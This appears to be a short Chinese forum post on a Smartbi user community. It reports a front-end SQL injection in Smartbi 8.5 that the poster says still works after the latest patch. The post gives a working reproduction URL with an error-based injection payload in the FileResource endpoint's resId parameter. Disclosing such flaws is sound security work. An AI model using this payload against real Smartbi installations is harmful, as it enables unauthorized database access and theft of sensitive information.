提问题
提建议
Smarbi 前台存在 SQL 注入漏洞,攻击者可以利用漏洞获取系统 中的敏感信息。
smartbi版本:Version:8.5.42692.18463
复现方式:https://域名/smartbi/vision/FileResource?op=OPEN&resId=LOGIN_BG_IMG%27%20AND%20extractvalue(1,%20concat(0,%20md5(%27yhrue%27)))
已更新最新补丁,还是可以复现这个漏洞
使用道具 赞 举报
本版积分规则 发表回复 回帖后跳转到最后一页
认证闯关赛最高赢回600麦豆
Smartbi进阶任务奖励500麦豆
赢取100麦豆,解锁数据分析新技能!
学习心得分享——数据分析学习之旅
原创案例分享大赛正式启动,至高800麦豆等你来领取!
Smartbi新手任务奖励288麦豆
免费